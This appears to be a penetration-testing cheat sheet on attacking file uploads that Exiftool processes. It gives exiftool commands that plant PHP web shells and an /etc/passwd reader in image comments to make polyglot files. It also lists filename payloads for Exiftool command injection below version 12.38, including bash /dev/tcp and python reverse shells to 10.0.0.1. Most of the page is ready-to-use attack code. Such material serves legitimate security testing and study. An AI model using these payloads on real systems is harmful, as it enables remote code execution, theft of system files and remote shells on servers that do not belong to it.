# File Upload Attack on Exiftool

If website uses Exiftool to analyze uploaded files, we might be able to exploit the vulnerabilities.

### Polyglot Attack <a href="#polyglot-attack" id="polyglot-attack"></a>

We might be able to execute remote code by polyglotting the original plain image file.\
At first, create a blank image file as below, but this step may be not required if you already have some image file.

```shellscript
convert -size 32x32 xc:white test.jpg
```

Then insert **OS command** with **exiftool**.

```shellscript
exiftool -Comment="<?php system('ls'); ?>" example.png
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' exploit.png
exiftool -Comment="<?php echo 'START ' . file_get_contents('/etc/passwd') . ' END'; ?>" example.jpg -o polyglot.php
```

### Command Injection (version < v12.38) <a href="#command-injection-version-v1238" id="command-injection-version-v1238"></a>

On Exiftool version lower than **12.38**, we can inject **OS command** in the filename when uploading.

```shellscript
# Ping
filename="touch test; ping -c 1 10.0.0.1 |"

# Reverse shell
filename="touch test; bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 |"
filename="touch test; bash -c \"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1\" |"
filename="touch test; python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"10.0.0.1\", 1234));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"bash\")' |"
```